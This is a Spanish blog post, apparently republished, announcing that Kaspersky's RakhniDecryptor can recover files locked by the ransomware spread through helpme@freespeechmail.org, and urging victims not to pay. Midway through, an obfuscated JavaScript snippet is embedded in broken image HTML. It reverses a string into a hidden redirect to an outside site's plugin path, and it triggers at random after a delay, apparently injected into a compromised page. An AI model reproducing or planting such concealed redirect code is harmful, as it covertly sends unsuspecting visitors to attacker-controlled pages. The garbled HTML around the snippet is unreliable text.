Los datos afectados por el malware distribuido en el correo helpme@freespeechmail.org se pueden descifrar gratis
Los ransomware se suceden y durante las últimas semanas los usuarios se han visto afectados por una nueva amenaza. Los usuarios están recibiendo correos electrónicos de las direcciones helpme@freespeechmail.org y file2@openmailbox.org con un archivo adjunto que es el instalador del virus informático.
Cuando esta realiza el cifrado sustituye el fondo de pantalla fijado por el usuario, utilizando una imagen en la que se describe lo sucedido y se da al usuario instrucciones para recuperar la información, instando a contactar con el propietario de la amenaza para realizar el pago. Se trata de una de las formas de actuación más extensas, ya que todos los virus que proceden al cifrado de los archivos en los equipos de los usuarios solicitan el ingreso de una cantidad monetaria casi siempre haciendo uso de monederos de criptomonedas.
En la siguiente se puede apreciar lo que hemos comentado con anterioridad:
helpme@freespeechmail.org como recuperar archivos
Sin embargo, por suerte para los usuarios que se han visto afectados no es necesario realizar el pago, sobre todo porque este no garantiza que el ciberdelincuentes facilite las claves para realizar el descifrado de la información. Los responsables de Kaspersky han desarrollado una herramienta que permite recuperar el acceso a estos utilizando un algoritmo de fuerza bruta para descubrir cuál es la clave utilizada.
Esta utilidad permite al usuario analizar unidades de disco tanto a nivel local como en una red local. La utilidad permite eliminar los datos cifrados después de realizar su descifrado, sin embargo, no se recomienda marcar esta opción si no se está seguro de que todos los archivos se han recuperado de forma correcta.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tor.jpg?x=480″ alt=”” width=”480″ height=”441″ /></p>
<p>descifrar archivos Kaspersky RakhniDecryp<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tor
Desde la compañía no recomiendan bajo ningún concepto realizar el pago, exista o no herramienta para recuperar el acceso, ya que la mayoría de los casos (por no decir todos) los usuarios hacen el pago de la cantidad indicada y después nunca reciben la clave o la que se recibe no funciona y por lo tanto la pérdida es doble.
En este enlace se puede consultar los ransomware frente a los que la herramienta es eficaz: http://www.bleepingcomputer.com/news/security/new-helpme-freespeechmail-org-ransomware-can-be-decrypted-for-free/
Descargar Kaspersky RakhniDecryptor para descifrar los archivos afectados:
Ver información original al respecto en Fuente: tos-afectados-por-el-malware-distribuido-en-el-correo-helpmefreespeechmail-org-se-pueden-descifrar-gratis/#sthash.EjhOUVfv.dpuf
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.